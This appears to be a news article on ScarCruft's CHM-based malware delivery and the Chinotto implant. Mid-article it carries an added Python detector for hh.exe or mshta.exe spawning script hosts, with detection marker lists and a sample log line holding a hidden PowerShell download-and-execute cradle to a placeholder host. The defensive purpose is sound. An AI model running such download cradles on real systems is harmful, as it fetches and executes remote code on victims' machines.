  • New backdoor distribution method revealed

    North Korean APT group ScarCruft uses Microsoft Compiled HTML Help (CHM) files to download additional malware onto target machines.

    The ScarCruft group (also tracked as APT37, Reaper, RedEyes and Ricochet Chollima) has been actively attacking various South Korean organizations for espionage purposes since the beginning of 2023. The group is known to have been active since at least 2012.

    According to multiple reports from the AhnLab Security Emergency Response Center (ASEC), SEKOIA.IO, and Zscaler, the group's new tactics illustrate the ongoing efforts of hackers to improve and retool their attacks to bypass detection.

    According to the researchers, in the discovered campaign the attackers use CHM, HTA, LNK and XLL files, as well as Microsoft Office documents with macros, in their targeted phishing attacks against South Korea.
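A defender-side check for the CHM lure behaviour described above, written as an added example that is not code from the article or from the vendor reports it cites. It assumes Sysmon-style process-creation records in a constructed `Key=Value|Key=Value` format and flags the Windows CHM handler (hh.exe) or HTA handler (mshta.exe) spawning a script host or download-capable LOLBin, raising the severity when the child's command line looks like a second-stage fetch. The sample log lines, the marker list and the host names are all constructed for the example.

```python
"""Flag script interpreters spawned by Windows' CHM/HTA handlers.

Added example (not code from the original article). It walks constructed
Sysmon-style process-creation records and raises a finding when the CHM
handler (hh.exe) or the HTA handler (mshta.exe) starts a scripting or
download-capable child, the behaviour the article attributes to the lures.
"""
import ntpath
from dataclasses import dataclass

# Handlers Windows uses to open two of the lure formats named in the article.
LURE_HANDLERS = {"hh.exe": "CHM", "mshta.exe": "HTA"}

# Children that a help file or HTML application has no business launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "bitsadmin.exe"}

# Substrings suggesting the child fetches a second stage (constructed list,
# not an exhaustive or vendor-sourced signature).
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "frombase64string", "-enc")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    lure_format: str
    child: str
    severity: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' record (constructed log format)."""
    fields = {}
    for part in line.rstrip("\n").split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcEvent(fields.get("ParentImage", ""),
                     fields.get("Image", ""),
                     fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so variants in casing match."""
    return ntpath.basename(path).lower()


def evaluate(event: ProcEvent):
    """Return a Finding if a lure handler spawned a suspicious child, else None."""
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent not in LURE_HANDLERS or child not in SCRIPT_HOSTS:
        return None
    lowered = event.command_line.lower()
    fetches = any(marker in lowered for marker in DOWNLOAD_MARKERS)
    return Finding(LURE_HANDLERS[parent], child,
                   "high" if fetches else "medium", event.command_line)


def scan(lines):
    """Evaluate every non-empty record and collect the findings in order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        finding = evaluate(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry: one CHM-to-PowerShell fetch, one benign
# launch of hh.exe itself, one HTA-to-cmd spawn, and one harmless child.
SAMPLE_LOG = [
    r"ParentImage=C:\Windows\hh.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\hh.exe|CommandLine=hh.exe C:\Users\user\Downloads\invoice.chm",
    r"ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c whoami",
    r"ParentImage=C:\Windows\hh.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe readme.txt",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.lure_format} lure -> {f.child}: {f.command_line}")
```

The parent/child pairing is the durable part of the rule: a help file or HTML application that starts PowerShell or cmd is anomalous regardless of what the command line contains, so the download markers only raise severity rather than gate the alert. Benign opens of hh.exe itself (record two) produce nothing, which keeps the rule quiet on ordinary help-file use.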

    The infection chains display a decoy document and deploy an updated version of a PowerShell-based implant called Chinotto, which can execute commands sent by the C2 server and exfiltrate sensitive data.

    Some of Chinotto's new features include taking screenshots every 5 seconds and logging keystrokes. The collected information is then stored in a ZIP archive and sent to a remote server.

    Information about various ScarCruft attack vectors comes from a GitHub repository that has been maintained by attackers to host malicious payloads since October 2020.

    In addition to spreading malware, ScarCruft also hosts phishing web pages from email and cloud services such as Naver, iCloud, Kakao, Mail.ru, and 163.com.

    It is unclear how victims reach these pages. Most likely, the phishing forms were embedded in iframes on compromised, attacker-controlled sites, or sent as HTML email attachments.

    SEKOIA.IO also discovered a backdoor called AblyGo written in Golang that uses the Ably messaging platform to receive commands.

    ScarCruft is not the only North Korean group running espionage campaigns against South Korean targets. Earlier, it was reported that North Korean government hackers Kimsuky spied on South Korean journalists using an infected Android application as part of a social engineering campaign.

    Author DeepWeb